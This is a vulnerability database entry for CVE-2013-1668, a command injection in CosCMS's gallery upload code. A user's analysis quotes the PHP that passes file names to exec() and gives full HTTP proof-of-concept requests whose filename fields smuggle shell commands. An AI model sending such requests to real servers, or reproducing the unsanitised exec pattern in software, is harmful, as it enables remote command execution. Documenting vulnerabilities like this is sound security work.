Attacker Value
Unknown
CVE-2013-1668
Attacker Value
Unknown
(1 user assessed)
Exploitability
Unknown
(1 user assessed)User Interaction
Unknown
Privileges Required
Unknown
Attack Vector
Unknown
MITRE ATT&CK
Log in to add MITRE ATT&CK tag
Add MITRE ATT&CK tactics and techniques that apply to this CVE.
Description
The uploadFile function in upload/index.php in CosCMS before 1.822 allows remote administrators to execute arbitrary commands via shell metacharacters in the name of an uploaded file.
Add Assessment
1
Technical Analysis
- In fact, doesn’t seem like the user should be authenticated at all. Looking at this request:
POST /gallery/upload/index HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------21456260222104 Content-Length: 970 -----------------------------21456260222104 Content-Disposition: form-data; name="title" 1 -----------------------------21456260222104 Content-Disposition: form-data; name="image_add" 1 -----------------------------21456260222104 Content-Disposition: form-data; name="description" 1 -----------------------------21456260222104 Content-Disposition: form-data; name="tags" -----------------------------21456260222104 Content-Disposition: form-data; name="MAX_FILE_SIZE" 100000000 -----------------------------21456260222104 Content-Disposition: form-data; name="APC_UPLOAD_PROGRESS" 511ad0922b50f -----------------------------21456260222104 Content-Di sposition: form-data; name="file"; filename="1 & ls -la > file.txt" Content-Type: application/octet-stream 1 -----------------------------21456260222104 Content-Disposition: form-data; name="submit" Update -----------------------------21456260222104--
According to my testing, really authentication isn’t needed to reach the vulnerable code.
- Vulnerability: The vulnerable resides on modules/gallery/upload/index.php, in the uploadFile() function, where
$exec is called with partially user controlled data:
$command = "mv " . $_FILES['file']['tmp_name'] . " $zip"; //die; exec ($command, $output = array (), $res); $command = "chmod 777 " . $zip; exec ($command, $output = array (), $res); $command = "unzip -o -UU " . $zip; exec ($command, $output = array (), $res);
The $zip variable can be partially controlled:
$zip = "/tmp/" . $_FILES['file']['name'];
Since $_FILES[‘file’][‘name’] is used for injection “/” is a badchar, which makes exploitation (of something usefull) really difficult:
- Execution is with www-data privileges by default, not a lot of things to do.
- You are executing from modules/gallery/upload where by default, and in the recommended installation user hasn’t privileges for writting. So
the provided PoC by htbridge doesn’t work at all in a default installation:
Content-Di sposition: form-data; name="file"; filename="1 & ls -la > file.txt"
You cannot write file.txt in modules/gallery/upload by default.
My PoC:
POST /gallery/upload/index HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: http://localhost/gallery/view/1 Content-Type: multipart/form-data; boundary=---------------------------1107861128371857341391966473 Content-Length: 360 -----------------------------1107861128371857341391966473 Content-Disposition: form-data; name="file"; filename="ls; <COMMAND>" Content-Type: text/plain msf.txt -----------------------------1107861128371857341391966473 Content-Disposition: form-data; name="submit" Upload File -----------------------------1107861128371857341391966473--
CVSS V3 Severity and Metrics
Data provided by the National Vulnerability Database (NVD)
Base Score:
None
Impact Score:
Unknown
Exploitability Score:
Unknown
Attack Vector (AV):
Unknown
Attack Complexity (AC):
Unknown
Privileges Required (PR):
Unknown
User Interaction (UI):
Unknown
Scope (S):
Unknown
Confidentiality (C):
Unknown
Integrity (I):
Unknown
Availability (A):
Unknown
General Information
Vendors
- coscms
Products
- coscms,
- coscms 1.3,
- coscms 1.41
References
Advisory
Miscellaneous
